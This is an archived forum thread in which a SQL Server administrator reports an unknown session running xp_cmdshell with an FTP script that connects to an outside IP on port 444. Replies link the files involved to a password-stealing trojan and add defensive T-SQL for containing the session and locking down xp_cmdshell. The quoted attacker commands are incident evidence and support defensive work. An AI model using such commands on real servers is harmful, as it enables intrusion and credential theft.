SQL Server Performance Forum – Threads Archive
xp_cmdshell "ftp -s:c:\winnt\axis.cmd" I saw this in one of my processes (spid 53), and no internal developer/user is running this command. Could this be a virus or hacker? Anyone seen this before? Thanks,
Check this I found on the net: http://www.systemsaxis.co.uk/diplomat2000/support/errors.htm Luis Martin …Thus mathematics may be defined as the subject in which we never know what we are talking about, nor whether what we are saying is true.
I think somebody’s trying to hack my machine. This is the detail of the axis.cmd:
open 18.104.22.168 444
EXIT
Any help would be greatly appreciated. Jon M
I couldn’t even delete the process nor delete the user login. Help! Jon M
I found some detail that may be of use when I went hunting the individual details in the axis.cmd that you listed. Tzolibr.dll is found in a few viruses/trojan horses and info gatherers.
Sud.exe is listed as a backdoor thing-y (forgive my lack of technical usage; if it's not SQL related, I probably don't know the language). It is a password stealer, so it's quite important that you deal with it immediately.
There is some more detailed info about sud.exe at http://www3.ca.com/virusinfo/virus.aspx?ID=9739
This is the closest MS info on it: http://www.microsoft.com/technet/security/bulletin/ms00-057.asp What you have looks like a version of this, probably with some basic file names to make it less detectable. Check the virus sites and Microsoft for information on removing this. Start with a Google search on sud.exe and see where it leads you, then subsearch etc., until you find an exact enough listing. And look into a good virus blocking tool and make sure you get updates regularly for it. Good luck and keep us posted.
Piggy-backing on Chris, I suggest you take a look at http:www.sqlsecurity.com.
Very good information on how to secure your server. Hm… I think somewhere I have the source from Openhack 2002 on my computer. IIRC there was a description by Microsoft on the absolute minimum permission needed to run SQL Server. If wanted, just post and I’ll dig. Frank
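As an added example (not posted by anyone in this thread), the T-SQL a DBA could run to triage and contain a session like the one described above: list user sessions, see what the suspect session sent, kill it, and then remove the ability to call xp_cmdshell. It assumes the suspect SPID is 53 as in the first post; the commands used (master..sysprocesses, DBCC INPUTBUFFER, KILL, sp_configure, REVOKE, sp_dropextendedproc) are standard SQL Server system objects, and the login name in the last step is a placeholder, not a value from the thread.

```sql
-- Added example, not from the thread. Run in master as a sysadmin.
-- Assumption: the suspect session is SPID 53 (taken from the first post).

-- 1. List user sessions with who, where from, and which client program.
--    SPIDs up to 50 are reserved for system tasks.
SELECT spid, loginame, hostname, program_name, cmd, login_time
FROM master..sysprocesses
WHERE spid > 50;

-- 2. Show the last batch the suspect session sent (the xp_cmdshell call).
DBCC INPUTBUFFER(53);

-- 3. Terminate the session. xp_cmdshell runs the child process synchronously,
--    so the KILL does not complete until ftp.exe on the server has exited;
--    end that OS process on the host as well if the session stays in KILLED/ROLLBACK.
KILL 53;

-- 4a. SQL Server 2005 and later: switch xp_cmdshell off entirely.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 4b. SQL Server 2000 has no such switch: revoke any EXECUTE grants on it
--     (sysadmin keeps access), or drop the extended procedure altogether.
USE master;
REVOKE EXECUTE ON xp_cmdshell FROM public;
-- EXEC sp_dropextendedproc 'xp_cmdshell';   -- stronger option; keep a note for re-adding

-- 5. Review logins, newest first, for accounts nobody created.
SELECT name, sysadmin, createdate
FROM master..syslogins
ORDER BY createdate DESC;
-- EXEC sp_droplogin 'SUSPICIOUS_LOGIN';    -- placeholder name; confirm before dropping
```

Step 3 is the likely reason a KILL appeared not to work in this thread: the session is waiting on the external ftp process, and the SPID only disappears once that process ends. Steps 4a/4b are the persistent fix; restricting xp_cmdshell (and running the service under a low-privilege account, as the Openhack material mentioned above describes) limits what a compromised login can do with it.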
Sorry, too dumb to hack in the correct link this morning.
Thanks for all the info guys. Jon M